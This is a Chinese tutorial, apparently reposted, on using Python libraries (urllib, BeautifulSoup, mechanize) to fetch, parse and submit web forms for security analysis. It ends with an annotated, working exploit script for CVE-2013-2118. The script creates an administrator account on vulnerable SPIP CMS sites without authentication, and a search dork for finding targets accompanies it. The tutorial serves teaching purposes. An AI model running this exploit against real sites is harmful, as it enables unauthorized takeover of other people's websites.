<span id="7ztzv"></span>
<sub id="7ztzv"></sub>

<span id="7ztzv"></span><form id="7ztzv"></form>

<span id="7ztzv"></span>

        <address id="7ztzv"></address>

            原文地址:http://drops.wooyun.org/tips/2591

            0x00 概述


            本文從實例代碼出發,講解了Python在WEB安全分析中的作用,以最基礎的示例向讀者展示了Python如何解析、獲取、以及處理各種類型的WEB頁面 系統環境:kali + beautifulsoup + mechanize,由于不涉及底層驅動設計,文中的示例代碼可以在任意平臺使用,當然無論什么平臺都要安裝好所用的插件。

            0x01 利用python獲取WEB頁面


            #!bash
            Python 2.7.6 (default, Nov 10 2013, 19:24:24) [MSC v.1500 64 bit (AMD64)] on win32
            Type "copyright", "credits" or "license()" for more information.
            >>> import urllib
            

            首先引入urllib以繼續下面的分析

            #!python
            >>> httpResponse = urllib.urlopen("http://www.baidu.com")
            

            以百度為例獲取http響應

            #!python
            >>> httpResponse.code
            200
            

            狀態為200 OK

            #!python
            >>> print httpResponse.read()[0:500]
            

            由于篇幅限制,只顯示前500好啦

            <!DOCTYPE html><!--STATUS OK--><html><head><meta http-equiv="content-type" content="text/html;charset=utf-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><link rel="dns-prefetch" /><link rel="dns-prefetch" /><link rel="dns-prefetch" /><link rel="dns-prefetch" /><link rel="dns-prefetch" /><link rel="dns-prefetch" /><link rel="dns-prefetch" href="http://t12.baidu.co
            

            看一下http響應的結構

            #!python
            >>> dir(httpResponse) ['doc', 'init', 'iter', 'module', 'repr', 'close', 'code', 'fileno', 'fp', 'getcode', 'geturl', 'headers', 'info', 'next', 'read', 'readline', 'readlines', 'url']
            

            查看響應所對應的url

            #!python
            >>> httpResponse.url
            'http://www.baidu.com'
            

            同理可查看headers結構的內部結構

            #!python
            >>> dir(httpResponse.headers)
            ['__contains__', '__delitem__', '__doc__', '__getitem__', '__init__', '__iter__', '__len__', '__module__', '__setitem__', '__str__', 'addcontinue', 'addheader', 'dict', 'encodingheader', 'fp', 'get', 'getaddr', 'getaddrlist', 'getallmatchingheaders', 'getdate', 'getdate_tz', 'getencoding', 'getfirstmatchingheader', 'getheader', 'getheaders', 'getmaintype', 'getparam', 'getparamnames', 'getplist', 'getrawheader', 'getsubtype', 'gettype', 'has_key', 'headers', 'iscomment', 'isheader', 'islast', 'items', 'keys', 'maintype', 'parseplist', 'parsetype', 'plist', 'plisttext', 'readheaders', 'rewindbody', 'seekable', 'setdefault', 'startofbody', 'startofheaders', 'status', 'subtype', 'type', 'typeheader', 'unixfrom', 'values']
            >>> httpResponse.headers.items()
            [('bdqid', '0xeb89374a00028e2e'), ('x-powered-by', 'HPHP'), ('set-cookie', 'BAIDUID=0C926CCF670378EAAA0BD29C611B3AE8:FG=1; expires=Thu, 31-Dec-37 23:55:55 GMT; max-age=2147483647; path=/; domain=.baidu.com, BDSVRTM=0; path=/, H_PS_PSSID=5615_4392_1423_7650_7571_6996_7445_7539_6505_6018_7254_7607_7134_7666_7415_7572_7580_7475; path=/; domain=.baidu.com'), ('expires', 'Tue, 15 Jul 2014 02:37:00 GMT'), ('vary', 'Accept-Encoding'), ('bduserid', '0'), ('server', 'BWS/1.1'), ('connection', 'Close'), ('cxy_all', 'baidu+776b3a548a71afebd09c6640f9af5559'), ('cache-control', 'private'), ('date', 'Tue, 15 Jul 2014 02:37:47 GMT'), ('p3p', 'CP=" OTI DSP COR IVA OUR IND COM "'), ('content-type', 'text/html; charset=utf-8'), ('bdpagetype', '1')]
            

            試著簡單解析一個

            #!python
            >>> for header,value in httpResponse.headers.items() :
                print header+':'+value    
            
            bdqid:0xeb89374a00028e2e
            x-powered-by:HPHP
            set-cookie:BAIDUID=0C926CCF670378EAAA0BD29C611B3AE8:FG=1; expires=Thu, 31-Dec-37 23:55:55 GMT; max-age=2147483647; path=/; domain=.baidu.com, BDSVRTM=0; path=/, H_PS_PSSID=5615_4392_1423_7650_7571_6996_7445_7539_6505_6018_7254_7607_7134_7666_7415_7572_7580_7475; path=/; domain=.baidu.com
            expires:Tue, 15 Jul 2014 02:37:00 GMT
            vary:Accept-Encoding
            bduserid:0
            server:BWS/1.1
            connection:Close
            cxy_all:baidu+776b3a548a71afebd09c6640f9af5559
            cache-control:private
            date:Tue, 15 Jul 2014 02:37:47 GMT
            p3p:CP=" OTI DSP COR IVA OUR IND COM "
            content-type:text/html; charset=utf-8
            bdpagetype:1
            
            >>> url = http://www.baidu.com/s?wd=df&rsv_spt=1
            

            完整的url用來獲取http頁面

            #!python
            >>> base_url = http://www.baidu.com
            

            基礎url

            #!python
            >>> args = {'wd':'df','rsv_spt':1}
            

            傳參單獨構造

            #!python
            >>> encode_args = urllib.urlencode(args)
            

            Urlencode可以編碼url形式

            #!python
            >>> fp2=urllib.urlopen(base_url+'/s?'+encode_args)
            

            重新嘗試以這樣的方式獲取WEB頁面

            #!python
            >>> print fp2.read()[0:500].decode("utf-8")
            

            由于頁面是utf-8的,因此解碼中文自己設置

            <!DOCTYPE html><!--STATUS OK--><html><head><meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"><meta http-equiv="content-type" content="text/html;charset=utf-8"><title>df_百度搜索</title><style data-for="result" >body{color:#333;background:#fff;padding:6px 0 0;margin:0;position:relative;min-width:900px}body,th,td,.p1,.p2{font-family:arial}p,form,ol,ul,li,dl,dt,dd,h3{margin:0;padding:0;list-style:none}input{padding-top:0;padding-bottom:0;-moz-box-sizing:border-box;-webkit-box-sizing
            >>>
            

            0x02 利用python解析html頁面


            首先安裝beautifulsoup ,http://www.crummy.com/software/BeautifulSoup/

            #!bash
            [email protected]:~/Desktop/beautifulsoup4-4.3.2# python setup.py install
            running install
            running build
            running build_py
            creating build/lib.linux-x86_64-2.7
            creating build/lib.linux-x86_64-2.7/bs4
            copying bs4/dammit.py -> build/lib.linux-x86_64-2.7/bs4
            copying bs4/testing.py -> build/lib.linux-x86_64-2.7/bs4
            copying bs4/element.py -> build/lib.linux-x86_64-2.7/bs4
            copying bs4/__init__.py -> build/lib.linux-x86_64-2.7/bs4
            …………………………………………………………部分省略
            copying bs4/diagnose.py -> build/lib.linux-x86_64-2.7/bs4
            creating build/lib.linux-x86_64-2.7/bs4/builder
            copying bs4/builder/_lxml.py -> build/lib.linux-x86_64-2.7/bs4/builder
            copying bs4/builder/_htmlparser.py -> build/lib.linux-x86_64-2.7/bs4/builder
            [email protected]:~/Desktop/beautifulsoup4-4.3.2#
            

            下面就可以使用bs4了

            #!bash
            [email protected]:~# python
            Python 2.7.3 (default, Jan  2 2013, 13:56:14) 
            [GCC 4.7.2] on linux2
            Type "help", "copyright", "credits" or "license" for more information.
            >>> from bs4 import BeautifulSoup
            

            導入bs4的包(之前安裝過了)

            #!python
            >>> import urllib
            >>> html = urllib.urlopen('http://www.baidu.com')
            >>> html.code
            200
            >>> bt = BeautifulSoup(html.read(),"lxml")
            

            Lxml解析大概是kali自帶的,windows下自己裝比較麻煩

            #!python
            >>> bt.title
            

            標題

            #!python
            <title>百度一下,你就知道</title>
            >>> bt.title.string
            u'\u767e\u5ea6\u4e00\u4e0b\uff0c\u4f60\u5c31\u77e5\u9053'
            >>> bt.meta
            <meta content="text/html;charset=utf-8" http-equiv="content-type"/>
            >>> bt.meta.next
            <meta content="IE=Edge" http-equiv="X-UA-Compatible"/>
            >>> bt.meta.next.next
            <link  rel="dns-prefetch"/>
            >>> allMetaTags = bt.find_all('meta')
            

            找出所有的meta數據標簽

            #!python
            >>> allMetaTags
            [<meta content="text/html;charset=utf-8" http-equiv="content-type"/>, <meta content="IE=Edge" http-equiv="X-UA-Compatible"/>, <meta content="0; url=/baidu.html?from=noscript" http-equiv="refresh"/>]
            >>> allMetaTags[0]
            <meta content="text/html;charset=utf-8" http-equiv="content-type"/>
            
            >>> allLinks = bt.find_all('a')
            

            找出所有的a標簽(鏈接)

            #!python
            >>> allLinks[0]
            <a  onmousedown="return user_c({'fm':'set','tab':'setting','login':'0'})">搜索設置</a>
            >>> allLinks[1]
            <a href="/" id="btop" onmousedown="return user_c({'fm':'set','tab':'index','login':'0'})">百度首頁</a>
            
            >>> for link in allLinks:
            ...     print link['href']
            ... 
            

            試著簡單的解析一下

            http://www.baidu.com/gaoji/preferences.html
            https://passport.baidu.com/v2/?login&tpl=mn&u=http%3A%2F%2Fwww.baidu.com%2F
            https://passport.baidu.com/v2/?reg&regType=1&tpl=mn&u=http%3A%2F%2Fwww.baidu.com%2F
            http://news.baidu.com/ns?cl=2&rn=20&tn=news&word=
            http://tieba.baidu.com/f?kw=&fr=wwwt
            http://zhidao.baidu.com/q?ct=17&pn=0&tn=ikaslist&rn=10&word=&fr=wwwt
            http://music.baidu.com/search?fr=ps&key=
            http://image.baidu.com/i?tn=baiduimage&ps=1&ct=201326592&lm=-1&cl=2&nc=1&word=
            http://v.baidu.com/v?ct=301989888&rn=20&pn=0&db=0&s=25&word=
            http://map.baidu.com/m?word=&fr=ps01000
            http://wenku.baidu.com/search?word=&lm=0&od=0
            

            0x03 利用python+mechanize處理表單


            #!python
            [email protected]:~# python
            Python 2.7.3 (default, Jan  2 2013, 13:56:14) 
            [GCC 4.7.2] on linux2
            Type "help", "copyright", "credits" or "license" for more information.
            >>> import mechanize
            

            導入mechanize

            #!python
            >>> br = mechanize.Browser()
            

            構建一個瀏覽器實例

            #!python
            >>> br.open('http://www.17173.com')
            

            打開一個有表單的頁面

            #!python
            <response_seek_wrapper at 0x248db90 whose wrapped object = <closeable_response at 0x248d098 whose fp = <socket._fileobject object at 0x1f868d0>>>
            
            >>> for form in br.forms():
            ...     print form
            ... 
            
            <GET http://search.17173.com/jsp/news_press.jsp application/x-www-form-urlencoded
              <HiddenControl(charset=gbk) (readonly)>
              <TextControl(keyword=????????)>
              <SubmitControl(<None>=????) (readonly)>>
            <searchask GET http://search.17173.com/jsp/game.jsp application/x-www-form-urlencoded
              <HiddenControl(charset=gbk) (readonly)>
              <TextControl(<None>=)>
              <TextControl(<None>=)>>
            <voteform POST http://vote.17173.com/action/vote_process.php application/x-www-form-urlencoded
              <HiddenControl(vote_id=9624) (readonly)>
              <HiddenControl(vote_year=) (readonly)>
              <CheckboxControl(vote_item_9624[]=[49649, 49650, 49651, 49652, 49653, 49654, 49655, 49656])>
              <SubmitControl(<None>=) (readonly)>>
            <GET http://search.17173.com/jsp/news_press.jsp application/x-www-form-urlencoded
              <HiddenControl(charset=gbk) (readonly)>
              <TextControl(keyword=????????)>
              <SubmitControl(<None>=????) (readonly)>>
            >>> 
            
            >>> br.select_form(nr=0)
            

            選擇要處理的表單

            #!python
            >>> br.form['keyword']='2013'
            

            設置表單屬性的值(TextControl)

            #!python
            >>> br.submit()
            

            模擬瀏覽器提交表單

            #!python
            <response_seek_wrapper at 0x248dab8 whose wrapped object = <closeable_response at 0x249d950 whose fp = <socket._fileobject object at 0x243e5d0>>>
            >>> br
            <mechanize._mechanize.Browser instance at 0x242ff38>
            >>>
            

            0x04 實例分析


            以下是一個CMS的管理員密碼能被越權找回漏洞,原作者信息均完整保留

            #!python
            #!/usr/bin/env python
            # Exploit Title: SPIP - CMS < 3.0.9 / 2.1.22 / 2.0.23 - Privilege escalation to administrator account from non authenticated user
            # Date: 04/30/2014
            # Flaw finder : Unknown
            # Exploit Author: Gregory DRAPERI
            # Email: gregory |dot| draperi |at| gmail |dot| com
            # Google Dork : inurl="spip.php"
            # Vendor Homepage: www.spip.net
            # Software Link: http://files.spip.org/spip/archives/
            # Version: SPIP < 3.0.9 / 2.1.22 / 2.0.23
            # Tested on: Windows 7 - SPIP 2.2.21
            # CVE : CVE-2013-2118
            '''
            ---------------------------------------------------------------------------------------------------------
            Software Description:
            SPIP is a free software content management system
            ---------------------------------------------------------------------------------------------------------
            Vulnerability Details:
            This vulnerability allows remote attackers to create an administrator account on the CMS without being authenticated.
            To exploit the flaw, a SMTP configuration has to be configured on SPIP because the password is sent by mail.
            
            '''
            import urllib, urllib2
            import cookielib
            import sys
            import re
            
            def send_request(urlOpener, url, post_data=None):
            //發送url(可選是否post)
               request = urllib2.Request(url)
            //使用urllib2來處理http請求
               url = urlOpener.open(request, post_data)
               return url.read()
            
            if len(sys.argv) < 4:
            //簡單的系統提示
               print "SPIP < 3.0.9 / 2.1.22 / 2.0.23 exploit by Gregory DRAPERI\n\tUsage: python script.py <SPIP base_url> <login> <mail>"
               exit()
            
            base_url = sys.argv[1]
            //網站地址
            login = sys.argv[2]
            //登陸地址
            mail = sys.argv[3]
            //越權發送郵件目的郵箱
            
            cookiejar = cookielib.CookieJar()
            //處理cookie以偽造身份
            urlOpener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookiejar))
            
            
            formulaire = send_request(urlOpener, base_url+"/spip.php?page=identifiants&mode=0minirezo")
            print "[+] First request sended..."
            //發送HTTP請求
            
            
            m = re.search("<input name='formulaire_action_args' type='hidden'\n[^>]*", formulaire)
            
            //尋找目標表單
            
            m = re.search("(?<=value=')[\w\+/=]*",m.group(0));
            
            
            formulaire_data = {'var_ajax' : 'form',
                               'page' : 'identifiants',
                               'mode' : '0minirezo',
                               'formulaire_action' : 'inscription',
                               'formulaire_action_args' : m.group(0),
                               'nom_inscription' : login,
                               'mail_inscription' : mail,
                               'nobot' : ''
                              }
            //構造請求中各參數
            formulaire_data = urllib.urlencode(formulaire_data)
            //進行url編碼
            
            
            send_request(urlOpener, base_url+"/spip.php?page=identifiants&mode=0minirezo", formulaire_data)
            print "[+] Second request sended"
            
            
            print "[+] You should receive an email with credentials soon :) "
            //第二次發送請求完畢后目標已經完成
            

            <span id="7ztzv"></span>
            <sub id="7ztzv"></sub>

            <span id="7ztzv"></span><form id="7ztzv"></form>

            <span id="7ztzv"></span>

                  <address id="7ztzv"></address>

                      亚洲欧美在线